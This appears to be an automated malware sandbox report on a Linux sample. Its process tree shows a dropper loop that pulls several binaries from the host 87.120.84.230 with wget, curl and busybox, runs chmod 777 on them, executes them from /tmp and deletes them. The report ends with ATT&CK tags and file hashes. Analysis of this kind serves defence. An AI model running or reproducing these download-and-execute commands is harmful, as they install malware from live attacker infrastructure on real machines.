/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵PID:863
-
/bin/chmodchmod 777 IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- File and Directory Permissions Modification
PID:864 -
/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR./IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- Executes dropped EXE
PID:865 -
/bin/rmrm IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵PID:866
-
/usr/bin/wgetwget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵PID:867
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:868 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵PID:869
-
/bin/chmodchmod 777 eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- File and Directory Permissions Modification
PID:870 -
/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj./eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- Executes dropped EXE
PID:871 -
/bin/rmrm eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵PID:872
-
/usr/bin/wgetwget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵PID:873
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:874 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵PID:875
-
/bin/chmodchmod 777 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- File and Directory Permissions Modification
PID:876 -
/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs./7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- Executes dropped EXE
PID:877 -
/bin/rmrm 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵PID:878
-
/usr/bin/wgetwget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵PID:879
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:880 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵PID:881
-
/bin/chmodchmod 777 OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- File and Directory Permissions Modification
PID:882 -
/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb./OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- Executes dropped EXE
PID:883 -
/bin/rmrm OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵PID:884
-
/usr/bin/wgetwget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵PID:885
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:887 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵PID:889
-
/bin/chmodchmod 777 zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- File and Directory Permissions Modification
PID:890 -
/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV./zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- Executes dropped EXE
PID:891 -
/bin/rmrm zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵PID:892
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- System Network Configuration Discovery
PID:893 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- System Network Configuration Discovery
PID:895 -
/bin/chmodchmod 777 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- File and Directory Permissions Modification
PID:896 -
/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ./ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:897 -
/bin/rmrm ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- System Network Configuration Discovery
PID:898 -
/usr/bin/wgetwget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵PID:899
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:900 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵PID:901
-
/bin/chmodchmod 777 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- File and Directory Permissions Modification
PID:902 -
/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd./KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- Executes dropped EXE
PID:903 -
/bin/rmrm KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵PID:904
-
/usr/bin/wgetwget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵PID:905
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:906 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵PID:907
-
/bin/chmodchmod 777 PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵
- File and Directory Permissions Modification
PID:908 -
/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13./PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵
- Executes dropped EXE
PID:909 -
/bin/rmrm PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵PID:910
-
/usr/bin/wgetwget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵PID:911
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:912 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵PID:913
-
/bin/chmodchmod 777 OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵
- File and Directory Permissions Modification
PID:914 -
/tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN./OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵
- Executes dropped EXE
PID:915 -
/bin/rmrm OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵PID:916
-
/usr/bin/wgetwget http://87.120.84.230/bins/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵PID:917
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:918 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵PID:919
-
/bin/chmodchmod 777 FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵
- File and Directory Permissions Modification
PID:920 -
/tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk./FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵
- Executes dropped EXE
PID:921 -
/bin/rmrm FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk2⤵PID:922
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵PID:923
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:924 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵PID:925
-
/bin/chmodchmod 777 ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵
- File and Directory Permissions Modification
PID:927 -
/tmp/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw./ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵
- Executes dropped EXE
PID:929 -
/bin/rmrm ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw2⤵PID:930
-
/usr/bin/wgetwget http://87.120.84.230/bins/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵PID:931
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:932 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵PID:933
-
/bin/chmodchmod 777 Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵
- File and Directory Permissions Modification
PID:934 -
/tmp/Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V./Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵
- Executes dropped EXE
PID:935 -
/bin/rmrm Dt1pmfxXNsHmfcoqpKErn8y8wwmTw86M0V2⤵PID:936
-
/usr/bin/wgetwget http://87.120.84.230/bins/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵PID:937
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:938 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵PID:939
-
/bin/chmodchmod 777 T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵
- File and Directory Permissions Modification
PID:940 -
/tmp/T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB6./T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵
- Executes dropped EXE
PID:941 -
/bin/rmrm T9gyamwGsDrzUKMNsko2j9OzUEFVyCXaB62⤵PID:942
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97